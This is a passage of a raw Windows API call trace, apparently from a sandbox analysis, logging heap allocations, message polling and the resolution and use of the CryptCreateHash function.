lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0237.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0237.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.593] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.593] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0237.662] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0237.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.662] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.663] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0237.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0237.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.663] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0237.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51340, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0237.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0237.663] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0237.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0237.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0237.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0237.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0237.664] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0237.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0237.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0237.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0237.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0237.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0237.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0237.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0237.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0237.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0237.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0237.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0237.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0237.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fa8 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0237.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55078, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0237.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0237.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0237.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0237.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0237.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0237.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0237.670] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0237.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0237.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f58 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0237.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0237.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0237.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0237.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0237.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0237.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0237.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0237.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.672] RtlAllocateHeap 